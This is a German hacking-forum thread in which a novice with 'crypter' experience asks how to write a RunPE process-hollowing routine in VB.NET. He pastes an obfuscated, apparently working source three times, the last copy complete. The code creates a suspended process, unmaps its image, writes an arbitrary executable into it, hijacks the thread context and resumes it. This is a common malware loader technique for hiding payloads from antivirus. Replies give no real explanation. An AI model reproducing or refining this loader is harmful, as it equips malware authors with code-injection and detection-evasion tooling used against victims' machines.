Ergebnis 1 bis 7 von 7
  1. 26.01.2018, 03:38 #1
    sirma000
    sirma000 ist offline
    Anfänger
    Registriert seit
    14.01.2018
    Beiträge
    6

    Standard Runpe Process Hollowing

    Kann mir Jemand villeicht zeigen wie ich selber ein Runpe in Visual Basic Codieren kann.

    hat da jemand ahnung davon?
    Zitieren Zitieren
  2. 26.01.2018, 08:52 #2
    gORDon_vdLg
    gORDon_vdLg ist offline
    Tron Avatar von gORDon_vdLg
    Registriert seit
    23.07.2007
    Beiträge
    801

    Standard AW: Runpe Process Hollowing

    Wie weit bist du denn gekommen bzw. wo hapert es?
    Zitieren Zitieren
  3. 26.01.2018, 16:37 #3
    sirma000
    sirma000 ist offline
    Anfänger
    Registriert seit
    14.01.2018
    Beiträge
    6

    Standard AW: Runpe Process Hollowing

    Also das problem liegt darin wie ich Anfangen soll den Code zu erlernen, habe schon mit encrypt und decrypt erfahrungen gemacht, Bytes to string usw. funktioniert wunderbar.

    aber wenn ich mir so ein Runpe Code anschaue dann komm ich da echt wenig weit vorran,



    Habe ein Runpe Code zwar da ist aber veraltet und es gibt ja verschieden codes.

    würde gerne kapieren was z.B die einzelnen funktionen, z.b hier das : Public Declare Function dmAWRR Lib "kernel32" Alias "LoadLibraryA" (ByVal eXcI As String) As IntPtr
    Public Declare Function ZZvfGU Lib "kernel32" Alias "GetProcAddress" (ByVal HjrC As IntPtr, ByVal eXcI As String) As IntPtr


    bedeuten und wie man am besten anfangen soll um selber mal den Code zu schreiben


    Hier der ganze Code.

    Vielleicht kannn ja jemand mir einzelnt erklären wie und für was was bedeutet.

    vielen dank im vorraus.
    Code:
    Imports System.Runtime.InteropServices
Imports System.Text

'''' <summary>
'''' Coder : Rahoz
'''' RunPE Coder : Simon-Binyo
'''' Call : ( byte() , String )
'''' Purpose : Execute App In Memory from byte array
'''' </summary>

Public Class gFDLGDFASKL
    Public Declare Function dmAWRR Lib "kernel32" Alias "LoadLibraryA" (ByVal eXcI As String) As IntPtr
    Public Declare Function ZZvfGU Lib "kernel32" Alias "GetProcAddress" (ByVal HjrC As IntPtr, ByVal eXcI As String) As IntPtr
    Function BUeBsTZDkKEMbrG(Of T)(ByVal eXcI As String, ByVal KAvK As String) As T
        Return DirectCast(DirectCast(Marshal.GetDelegateForFunctionPointer(ZZvfGU(dmAWRR(eXcI), KAvK), GetType(T)), Object), T)
    End Function
    Delegate Function NOJMkg(ByVal GBFW As IntPtr, ByVal EFfDmpqlB As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean
    Delegate Function Luoipi(ByVal CCPh As IntPtr, ByVal kPCK As IntPtr) As UInteger
    Delegate Function AAAAA(ByVal CCPh As IntPtr, ByVal kPCK As IntPtr, ByRef bufr As IntPtr, ByVal bufrMWayWhlwz As Integer, ByRef WZwg As IntPtr) As <MarshalAs(UnmanagedType.Bool)> Boolean
    Delegate Function NTJceg(ByVal GBFWead As IntPtr, ByVal NaQE As IntPtr) As UInteger
    Delegate Function RNzQc(ByVal GBFW As IntPtr, ByVal EFfDmpqlB As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean
    Delegate Function gNNNNN(ByVal CCPh As IntPtr, ByVal tDjF As IntPtr, ByVal MWayWhlwz As IntPtr, ByVal bQWh As Integer, ByVal oEtR As Integer) As IntPtr
    Delegate Function lkgzcI(ByVal CCPhess As IntPtr, ByVal DSvGRqwzF As IntPtr, ByVal Ebkb As Byte(), ByVal nMWayWhlwz As UInteger, ByVal awiftTtgC As Integer) As Boolean
    Public Declare Auto Function Pjfqge Lib "kernel32" Alias "CreateProcessW" (ByVal kEDd As String, ByVal SRqF As StringBuilder, ByVal EEXsqPyEy As IntPtr, ByVal fFOp As IntPtr, <MarshalAs(UnmanagedType.Bool)> ByVal vdEz As Boolean, ByVal bGYB As Integer, ByVal KTKd As IntPtr, ByVal WGiN As String, ByVal meYX As Byte(), ByVal SHsY As IntPtr()) As <MarshalAs(UnmanagedType.Bool)> Boolean
    Private Function CeCyARJ(ByVal FsQGol As Long, Optional ByVal zRwHpUb As Long = &H4) As Integer
        Dim qZYGUEz As IntPtr
        Dim WBiwMxI As Integer
        Dim eIfLI As AAAAA = BUeBsTZDkKEMbrG(Of AAAAA)("ntdll", "NtReadVirtualMemory")
        Call eIfLI(Process.GetCurrentProcess.Handle, FsQGol, qZYGUEz, zRwHpUb, WBiwMxI)
        Return qZYGUEz
    End Function
    Public Function GNMNioZVtaV(ByVal RIAkWcIh As Byte(), ByVal MRbichBw As String) As Boolean
        Try
            Dim Wakodbh As GCHandle = GCHandle.Alloc(RIAkWcIh, GCHandleType.Pinned) : Dim hModuleBase As Integer = Wakodbh.AddrOfPinnedObject : Wakodbh.Free()
            Dim EEXsqPyEy As IntPtr = IntPtr.Zero
            Dim yYEifvEzt As IntPtr() = New IntPtr(3) {}
            Dim PXYyxEHcm As Byte() = New Byte(67) {}
            Dim klhposaehf As Integer = BitConverter.ToInt32(RIAkWcIh, 60)
            Dim BmSklSftl As Integer
            Dim EFfDmpqlB As UInteger() = New UInteger(178) {}
            EFfDmpqlB(0) = &H10002
            Pjfqge(Nothing, New StringBuilder(MRbichBw), EEXsqPyEy, EEXsqPyEy, False, 4, EEXsqPyEy, Nothing, PXYyxEHcm, yYEifvEzt)
            Dim gnzWsnHkF As Integer = (hModuleBase + CeCyARJ(hModuleBase + &H3C))
            BmSklSftl = CeCyARJ(gnzWsnHkF + &H34)
            Dim qfXWO As Luoipi = BUeBsTZDkKEMbrG(Of Luoipi)("ntdll", "NtUnmapViewOfSection")
            qfXWO(yYEifvEzt(0), BmSklSftl)
            Dim WIqYC As gNNNNN = BUeBsTZDkKEMbrG(Of gNNNNN)("kernel32", "VirtualAllocEx")
            Dim DSvGRqwzF As IntPtr = WIqYC(yYEifvEzt(0), BmSklSftl, CeCyARJ(gnzWsnHkF + &H50), &H3000, &H40)
            Dim AEhEKTVFO As New IntPtr(BitConverter.ToInt32(RIAkWcIh, klhposaehf + &H34))
            Dim MWayWhlwz As New IntPtr(BitConverter.ToInt32(RIAkWcIh, klhposaehf + 80))
            Dim bdLBZrKmW As Integer
            Dim rszaetz As Integer
            Dim api8 As lkgzcI = BUeBsTZDkKEMbrG(Of lkgzcI)("ntdll", "NtWriteVirtualMemory")
            api8(yYEifvEzt(0), DSvGRqwzF, RIAkWcIh, CUInt(CInt(CeCyARJ(gnzWsnHkF + &H54))), bdLBZrKmW)
            For i = 0 To CeCyARJ(gnzWsnHkF + &H6, 2) - 1
                Dim QcXOrDrbL As Integer() = New Integer(9) {}
                Buffer.BlockCopy(RIAkWcIh, (klhposaehf + &HF8) + (i * 40), QcXOrDrbL, 0, 40)
                Dim ljsdhhds As Byte() = New Byte((QcXOrDrbL(4) - 1)) {}
                Buffer.BlockCopy(RIAkWcIh, QcXOrDrbL(5), ljsdhhds, 0, ljsdhhds.Length)
                MWayWhlwz = New IntPtr(DSvGRqwzF.ToInt32() + QcXOrDrbL(3))
                AEhEKTVFO = New IntPtr(ljsdhhds.Length)
                api8(yYEifvEzt(0), MWayWhlwz, ljsdhhds, CUInt(AEhEKTVFO), rszaetz)
            Next i
            Dim sdfsgt As NOJMkg = BUeBsTZDkKEMbrG(Of NOJMkg)("ntdll", "NtGetContextThread")
            sdfsgt(yYEifvEzt(1), EFfDmpqlB)
            api8(yYEifvEzt(0), EFfDmpqlB(41) + &H8, BitConverter.GetBytes(DSvGRqwzF.ToInt32()), CUInt(&H4), rszaetz)
            EFfDmpqlB(&H2C) = BmSklSftl + CeCyARJ(gnzWsnHkF + &H28)
            Dim ihsg As RNzQc = BUeBsTZDkKEMbrG(Of RNzQc)("ntdll", "NtSetContextThread")
            ihsg(yYEifvEzt(1), EFfDmpqlB)
            Dim ByZcV As NTJceg = BUeBsTZDkKEMbrG(Of NTJceg)("ntdll", "NtResumeThread")
            ByZcV(yYEifvEzt(1), 0)
        Catch ex As Exception
            Return False
    Geändert von Barny (29.01.2018 um 17:08 Uhr)
    Zitieren Zitieren
  4. 26.01.2018, 16:50 #4
    sirma000
    sirma000 ist offline
    Anfänger
    Registriert seit
    14.01.2018
    Beiträge
    6

    Standard AW: Runpe Process Hollowing

    Habe gerade ne Antwort

    ---------- Post added at 17:50 ---------- Previous post was at 17:45 ----------

    Bisher haber ich Nur Crypterfahrungen gemacht in VB
    Hier ist ein Code mit dem ich mich beschäftige.

    der funktioniert bei mir nur ist er Veraltert

    würde gern kapier was z.B das hier bedeutet
    Code:
    Public Declare Function dmAWRR Lib "kernel32" Alias "LoadLibraryA" (ByVal eXcI As String) As IntPtr
    Public Declare Function ZZvfGU Lib "kernel32" Alias "GetProcAddress" (ByVal HjrC As IntPtr, ByVal eXcI As String) As IntPtr






"Imports System.Runtime.InteropServices
Imports System.Text

'''' <summary>
'''' Coder : Rahoz
'''' RunPE Coder : Simon-Binyo
'''' Call : ( byte() , String )
'''' Purpose : Execute App In Memory from byte array
'''' </summary>

Public Class gFDLGDFASKL
    Public Declare Function dmAWRR Lib "kernel32" Alias "LoadLibraryA" (ByVal eXcI As String) As IntPtr
    Public Declare Function ZZvfGU Lib "kernel32" Alias "GetProcAddress" (ByVal HjrC As IntPtr, ByVal eXcI As String) As IntPtr
    Function BUeBsTZDkKEMbrG(Of T)(ByVal eXcI As String, ByVal KAvK As String) As T
        Return DirectCast(DirectCast(Marshal.GetDelegateForFunctionPointer(ZZvfGU(dmAWRR(eXcI), KAvK), GetType(T)), Object), T)
    End Function
     Delegate Function NOJMkg(ByVal GBFW As IntPtr, ByVal EFfDmpqlB As  UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean
    Delegate Function Luoipi(ByVal CCPh As IntPtr, ByVal kPCK As IntPtr) As UInteger
     Delegate Function AAAAA(ByVal CCPh As IntPtr, ByVal kPCK As IntPtr,  ByRef bufr As IntPtr, ByVal bufrMWayWhlwz As Integer, ByRef WZwg As  IntPtr) As <MarshalAs(UnmanagedType.Bool)> Boolean
    Delegate Function NTJceg(ByVal GBFWead As IntPtr, ByVal NaQE As IntPtr) As UInteger
     Delegate Function RNzQc(ByVal GBFW As IntPtr, ByVal EFfDmpqlB As  UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean
     Delegate Function gNNNNN(ByVal CCPh As IntPtr, ByVal tDjF As IntPtr,  ByVal MWayWhlwz As IntPtr, ByVal bQWh As Integer, ByVal oEtR As Integer)  As IntPtr
    Delegate Function lkgzcI(ByVal CCPhess As IntPtr,  ByVal DSvGRqwzF As IntPtr, ByVal Ebkb As Byte(), ByVal nMWayWhlwz As  UInteger, ByVal awiftTtgC As Integer) As Boolean
    Public Declare  Auto Function Pjfqge Lib "kernel32" Alias "CreateProcessW" (ByVal kEDd  As String, ByVal SRqF As StringBuilder, ByVal EEXsqPyEy As IntPtr, ByVal  fFOp As IntPtr, <MarshalAs(UnmanagedType.Bool)> ByVal vdEz As  Boolean, ByVal bGYB As Integer, ByVal KTKd As IntPtr, ByVal WGiN As  String, ByVal meYX As Byte(), ByVal SHsY As IntPtr()) As  <MarshalAs(UnmanagedType.Bool)> Boolean
    Private Function CeCyARJ(ByVal FsQGol As Long, Optional ByVal zRwHpUb As Long = &H4) As Integer
        Dim qZYGUEz As IntPtr
        Dim WBiwMxI As Integer
        Dim eIfLI As AAAAA = BUeBsTZDkKEMbrG(Of AAAAA)("ntdll", "NtReadVirtualMemory")
        Call eIfLI(Process.GetCurrentProcess.Handle, FsQGol, qZYGUEz, zRwHpUb, WBiwMxI)
        Return qZYGUEz
    End Function
    Public Function GNMNioZVtaV(ByVal RIAkWcIh As Byte(), ByVal MRbichBw As String) As Boolean
        Try
             Dim Wakodbh As GCHandle = GCHandle.Alloc(RIAkWcIh, GCHandleType.Pinned)  : Dim hModuleBase As Integer = Wakodbh.AddrOfPinnedObject :  Wakodbh.Free()
            Dim EEXsqPyEy As IntPtr = IntPtr.Zero
            Dim yYEifvEzt As IntPtr() = New IntPtr(3) {}
            Dim PXYyxEHcm As Byte() = New Byte(67) {}
            Dim klhposaehf As Integer = BitConverter.ToInt32(RIAkWcIh, 60)
            Dim BmSklSftl As Integer
            Dim EFfDmpqlB As UInteger() = New UInteger(178) {}
            EFfDmpqlB(0) = &H10002
             Pjfqge(Nothing, New StringBuilder(MRbichBw), EEXsqPyEy, EEXsqPyEy,  False, 4, EEXsqPyEy, Nothing, PXYyxEHcm, yYEifvEzt)
            Dim gnzWsnHkF As Integer = (hModuleBase + CeCyARJ(hModuleBase + &H3C))
            BmSklSftl = CeCyARJ(gnzWsnHkF + &H34)
            Dim qfXWO As Luoipi = BUeBsTZDkKEMbrG(Of Luoipi)("ntdll", "NtUnmapViewOfSection")
            qfXWO(yYEifvEzt(0), BmSklSftl)
            Dim WIqYC As gNNNNN = BUeBsTZDkKEMbrG(Of gNNNNN)("kernel32", "VirtualAllocEx")
            Dim DSvGRqwzF As IntPtr = WIqYC(yYEifvEzt(0), BmSklSftl, CeCyARJ(gnzWsnHkF + &H50), &H3000, &H40)
            Dim AEhEKTVFO As New IntPtr(BitConverter.ToInt32(RIAkWcIh, klhposaehf + &H34))
            Dim MWayWhlwz As New IntPtr(BitConverter.ToInt32(RIAkWcIh, klhposaehf + 80))
            Dim bdLBZrKmW As Integer
            Dim rszaetz As Integer
            Dim api8 As lkgzcI = BUeBsTZDkKEMbrG(Of lkgzcI)("ntdll", "NtWriteVirtualMemory")
            api8(yYEifvEzt(0), DSvGRqwzF, RIAkWcIh, CUInt(CInt(CeCyARJ(gnzWsnHkF + &H54))), bdLBZrKmW)
            For i = 0 To CeCyARJ(gnzWsnHkF + &H6, 2) - 1
                Dim QcXOrDrbL As Integer() = New Integer(9) {}
                Buffer.BlockCopy(RIAkWcIh, (klhposaehf + &HF8) + (i * 40), QcXOrDrbL, 0, 40)
                Dim ljsdhhds As Byte() = New Byte((QcXOrDrbL(4) - 1)) {}
                Buffer.BlockCopy(RIAkWcIh, QcXOrDrbL(5), ljsdhhds, 0, ljsdhhds.Length)
                MWayWhlwz = New IntPtr(DSvGRqwzF.ToInt32() + QcXOrDrbL(3))
                AEhEKTVFO = New IntPtr(ljsdhhds.Length)
                api8(yYEifvEzt(0), MWayWhlwz, ljsdhhds, CUInt(AEhEKTVFO), rszaetz)
            Next i
            Dim sdfsgt As NOJMkg = BUeBsTZDkKEMbrG(Of NOJMkg)("ntdll", "NtGetContextThread")
            sdfsgt(yYEifvEzt(1), EFfDmpqlB)
            api8(yYEifvEzt(0), EFfDmpqlB(41) + &H8, BitConverter.GetBytes(DSvGRqwzF.ToInt32()), CUInt(&H4), rszaetz)
            EFfDmpqlB(&H2C) = BmSklSftl + CeCyARJ(gnzWsnHkF + &H28)
            Dim ihsg As RNzQc = BUeBsTZDkKEMbrG(Of RNzQc)("ntdll", "NtSetContextThread")
            ihsg(yYEifvEzt(1), EFfDmpqlB)
            Dim ByZcV As NTJceg = BUeBsTZDkKEMbrG(Of NTJceg)("ntdll", "NtResumeThread")
            ByZcV(yYEifvEzt(1), 0)
        Catch ex As Exception
            Return False"
    Geändert von Barny (29.01.2018 um 17:07 Uhr)
    Zitieren Zitieren
  5. 26.01.2018, 16:51 #5
    sirma000
    sirma000 ist offline
    Anfänger
    Registriert seit
    14.01.2018
    Beiträge
    6

    Standard AW: Runpe Process Hollowing

    ich bekomme es nicht hin hier ein Code reinzumachen. Komisch
    Zitieren Zitieren
  6. 26.01.2018, 20:50 #6
    Cystasy
    Cystasy ist offline
    Wiederbelebt Avatar von Cystasy
    Registriert seit
    08.05.2015
    Beiträge
    685

    Standard AW: Runpe Process Hollowing

    Zitat Zitat von sirma000 Beitrag anzeigen
    ich bekomme es nicht hin hier ein Code reinzumachen. Komisch
    Woran scheitert es?

    Code:
    Beispielcode
    エロ <3
    Zitieren Zitieren
  7. 26.01.2018, 22:56 #7
    sirma000
    sirma000 ist offline
    Anfänger
    Registriert seit
    14.01.2018
    Beiträge
    6

    Standard

    OK denke das es jetzt klappen wird.


    Habe mit crypten schon erfahrung, läuft auch soweit gut.


    aber wenn ich mir den runpe code anschau verstehe ich da nichts.

    habe mir schon einige sachen über process hollowing angeschaut, dabei habe ich wenig gefunden wo mir was beibringen konnte.

    würde gerne verstehen was die einyelnen funktionen im runpe code bedeuten und wie man den selber schreiben kann.

    am besten über pm

    hier der code

    Code:
    Code:
    Imports System.Runtime.InteropServices
Imports System.Text

'''' <summary>
'''' Coder : Rahoz
'''' RunPE Coder : Simon-Binyo
'''' Call : ( byte() , String )
'''' Purpose : Execute App In Memory from byte array
'''' </summary>

Public Class gFDLGDFASKL
    Public Declare Function dmAWRR Lib "kernel32" Alias "LoadLibraryA" (ByVal eXcI As String) As IntPtr
    Public Declare Function ZZvfGU Lib "kernel32" Alias "GetProcAddress" (ByVal HjrC As IntPtr, ByVal eXcI As String) As IntPtr
    Function BUeBsTZDkKEMbrG(Of T)(ByVal eXcI As String, ByVal KAvK As String) As T
        Return DirectCast(DirectCast(Marshal.GetDelegateForFunctionPointer(ZZvfGU(dmAWRR(eXcI), KAvK), GetType(T)), Object), T)
    End Function
    Delegate Function NOJMkg(ByVal GBFW As IntPtr, ByVal EFfDmpqlB As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean
    Delegate Function Luoipi(ByVal CCPh As IntPtr, ByVal kPCK As IntPtr) As UInteger
    Delegate Function AAAAA(ByVal CCPh As IntPtr, ByVal kPCK As IntPtr, ByRef bufr As IntPtr, ByVal bufrMWayWhlwz As Integer, ByRef WZwg As IntPtr) As <MarshalAs(UnmanagedType.Bool)> Boolean
    Delegate Function NTJceg(ByVal GBFWead As IntPtr, ByVal NaQE As IntPtr) As UInteger
    Delegate Function RNzQc(ByVal GBFW As IntPtr, ByVal EFfDmpqlB As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean
    Delegate Function gNNNNN(ByVal CCPh As IntPtr, ByVal tDjF As IntPtr, ByVal MWayWhlwz As IntPtr, ByVal bQWh As Integer, ByVal oEtR As Integer) As IntPtr
    Delegate Function lkgzcI(ByVal CCPhess As IntPtr, ByVal DSvGRqwzF As IntPtr, ByVal Ebkb As Byte(), ByVal nMWayWhlwz As UInteger, ByVal awiftTtgC As Integer) As Boolean
    Public Declare Auto Function Pjfqge Lib "kernel32" Alias "CreateProcessW" (ByVal kEDd As String, ByVal SRqF As StringBuilder, ByVal EEXsqPyEy As IntPtr, ByVal fFOp As IntPtr, <MarshalAs(UnmanagedType.Bool)> ByVal vdEz As Boolean, ByVal bGYB As Integer, ByVal KTKd As IntPtr, ByVal WGiN As String, ByVal meYX As Byte(), ByVal SHsY As IntPtr()) As <MarshalAs(UnmanagedType.Bool)> Boolean
    Private Function CeCyARJ(ByVal FsQGol As Long, Optional ByVal zRwHpUb As Long = &H4) As Integer
        Dim qZYGUEz As IntPtr
        Dim WBiwMxI As Integer
        Dim eIfLI As AAAAA = BUeBsTZDkKEMbrG(Of AAAAA)("ntdll", "NtReadVirtualMemory")
        Call eIfLI(Process.GetCurrentProcess.Handle, FsQGol, qZYGUEz, zRwHpUb, WBiwMxI)
        Return qZYGUEz
    End Function
    Public Function GNMNioZVtaV(ByVal RIAkWcIh As Byte(), ByVal MRbichBw As String) As Boolean
        Try
            Dim Wakodbh As GCHandle = GCHandle.Alloc(RIAkWcIh, GCHandleType.Pinned) : Dim hModuleBase As Integer = Wakodbh.AddrOfPinnedObject : Wakodbh.Free()
            Dim EEXsqPyEy As IntPtr = IntPtr.Zero
            Dim yYEifvEzt As IntPtr() = New IntPtr(3) {}
            Dim PXYyxEHcm As Byte() = New Byte(67) {}
            Dim klhposaehf As Integer = BitConverter.ToInt32(RIAkWcIh, 60)
            Dim BmSklSftl As Integer
            Dim EFfDmpqlB As UInteger() = New UInteger(178) {}
            EFfDmpqlB(0) = &H10002
            Pjfqge(Nothing, New StringBuilder(MRbichBw), EEXsqPyEy, EEXsqPyEy, False, 4, EEXsqPyEy, Nothing, PXYyxEHcm, yYEifvEzt)
            Dim gnzWsnHkF As Integer = (hModuleBase + CeCyARJ(hModuleBase + &H3C))
            BmSklSftl = CeCyARJ(gnzWsnHkF + &H34)
            Dim qfXWO As Luoipi = BUeBsTZDkKEMbrG(Of Luoipi)("ntdll", "NtUnmapViewOfSection")
            qfXWO(yYEifvEzt(0), BmSklSftl)
            Dim WIqYC As gNNNNN = BUeBsTZDkKEMbrG(Of gNNNNN)("kernel32", "VirtualAllocEx")
            Dim DSvGRqwzF As IntPtr = WIqYC(yYEifvEzt(0), BmSklSftl, CeCyARJ(gnzWsnHkF + &H50), &H3000, &H40)
            Dim AEhEKTVFO As New IntPtr(BitConverter.ToInt32(RIAkWcIh, klhposaehf + &H34))
            Dim MWayWhlwz As New IntPtr(BitConverter.ToInt32(RIAkWcIh, klhposaehf + 80))
            Dim bdLBZrKmW As Integer
            Dim rszaetz As Integer
            Dim api8 As lkgzcI = BUeBsTZDkKEMbrG(Of lkgzcI)("ntdll", "NtWriteVirtualMemory")
            api8(yYEifvEzt(0), DSvGRqwzF, RIAkWcIh, CUInt(CInt(CeCyARJ(gnzWsnHkF + &H54))), bdLBZrKmW)
            For i = 0 To CeCyARJ(gnzWsnHkF + &H6, 2) - 1
                Dim QcXOrDrbL As Integer() = New Integer(9) {}
                Buffer.BlockCopy(RIAkWcIh, (klhposaehf + &HF8) + (i * 40), QcXOrDrbL, 0, 40)
                Dim ljsdhhds As Byte() = New Byte((QcXOrDrbL(4) - 1)) {}
                Buffer.BlockCopy(RIAkWcIh, QcXOrDrbL(5), ljsdhhds, 0, ljsdhhds.Length)
                MWayWhlwz = New IntPtr(DSvGRqwzF.ToInt32() + QcXOrDrbL(3))
                AEhEKTVFO = New IntPtr(ljsdhhds.Length)
                api8(yYEifvEzt(0), MWayWhlwz, ljsdhhds, CUInt(AEhEKTVFO), rszaetz)
            Next i
            Dim sdfsgt As NOJMkg = BUeBsTZDkKEMbrG(Of NOJMkg)("ntdll", "NtGetContextThread")
            sdfsgt(yYEifvEzt(1), EFfDmpqlB)
            api8(yYEifvEzt(0), EFfDmpqlB(41) + &H8, BitConverter.GetBytes(DSvGRqwzF.ToInt32()), CUInt(&H4), rszaetz)
            EFfDmpqlB(&H2C) = BmSklSftl + CeCyARJ(gnzWsnHkF + &H28)
            Dim ihsg As RNzQc = BUeBsTZDkKEMbrG(Of RNzQc)("ntdll", "NtSetContextThread")
            ihsg(yYEifvEzt(1), EFfDmpqlB)
            Dim ByZcV As NTJceg = BUeBsTZDkKEMbrG(Of NTJceg)("ntdll", "NtResumeThread")
            ByZcV(yYEifvEzt(1), 0)
        Catch ex As Exception
            Return False
        End Try
        Return True
    End Function
End Class
    ein Moderator muss mir die Nachricht erst freischalten mit dem Code

    ---------- Post added at 23:56 ---------- Previous post was at 22:05 ----------

    Kann ich eig. mein runpe Code mit einem Runpe Crypter verschlüsseln, und ganz normal ausführen?
    Geändert von Barny (30.01.2018 um 11:30 Uhr)
    Zitieren Zitieren
« Vorheriges Thema | Nächstes Thema »

Ähnliche Themen

  1. Unique RunPE
    Von Anatoxis im Forum Trashbox
    Antworten: 2
    Letzter Beitrag: 31.05.2010, 00:10
  2. [VB.NET Source] - RunPE
    Von Sawyer im Forum Trashbox
    Antworten: 0
    Letzter Beitrag: 18.09.2009, 14:38
  3. VB.NET - RunPE
    Von Sawyer im Forum .NET Sprachen - Techniken
    Antworten: 12
    Letzter Beitrag: 22.02.2009, 19:50
  4. [VB.NET] RunPE Problem
    Von hackerking im Forum .NET Sprachen - Techniken
    Antworten: 1
    Letzter Beitrag: 21.12.2008, 01:29

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •  

Foren-Regeln